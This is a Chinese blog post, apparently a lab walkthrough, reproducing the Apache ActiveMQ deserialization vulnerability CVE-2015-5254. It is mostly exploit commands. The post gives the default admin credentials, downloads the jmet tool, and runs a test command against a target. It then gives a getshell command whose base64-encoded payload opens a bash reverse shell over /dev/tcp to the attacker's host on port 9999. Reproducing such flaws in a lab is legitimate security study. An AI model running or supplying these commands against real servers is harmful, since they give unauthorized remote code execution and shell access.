Apache-ActiveMQ 反序列化漏洞(CVE-2015-5254)复现

CVE-2016-3088

一、环境搭建

Java:jdk8
影响版本 Apache ActiveMQ < 5.13.0

二、用docker搭建漏洞环境

访问一下web界面

然后进入admin目录登录

账号:admin

密码:admin

三、工具准备

  1. cd /opt

  2. wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar

  3. mkdir external

注意:一定要下载external,否则会报错

四、测试漏洞存在

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/sucess" -Yp ROME 8.210.152.234(靶机IP,下图说是自己的ip是错误的) 61616

点击触发命令执行

查看一下目录,发现创建成功

五、getshell

首先借用一个网站对payload进行处理,网址我以前的文章复现有提到。

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIxNy4xMjgvOTk5OSAwPiYxIA==}|{base64,-d}|{bash,-i}" 192.168.217.128 61616

最后点击它,触发命令执行

如上图所示即反弹shell成功!

相关推荐
漫霂7 分钟前
二叉树的翻转
java·数据结构·算法
语戚7 分钟前
力扣 51. N 皇后:基础回溯、布尔数组优化、位运算全解(Java 实现)
java·算法·leetcode·力扣·剪枝·回溯·位运算
程序猿阿越18 分钟前
Kafka4源码(三)Share Group共享组
java·后端·源码阅读
亦暖筑序19 分钟前
让AI不再"一本正经胡说八道":Spring AI RAG与VectorStore源码全解
java·源码阅读
蒙奇·D·路飞-23 分钟前
大模型时代下 Java 后端开发的技术重构与工程实践
java·开发语言·重构
小二·37 分钟前
2026年4月技术前沿:AI大模型爆发、智能体革命与量子安全新纪元
人工智能·安全
ZK_H1 小时前
半导体工艺流程
java·c语言·开发语言·计算机网络·金融
小手智联老徐1 小时前
OpenClaw 2026.4.10 发布:主动记忆系统登场,多平台集成与安全能力全面升级
安全·ai编程·openclaw
Crazy________1 小时前
4.10dockerfile构建镜像
java·开发语言
夜猫逐梦1 小时前
【AI】 Claude Code 源码泄露:一场关于安全与学习的风波
人工智能·安全·claude code·源码泄漏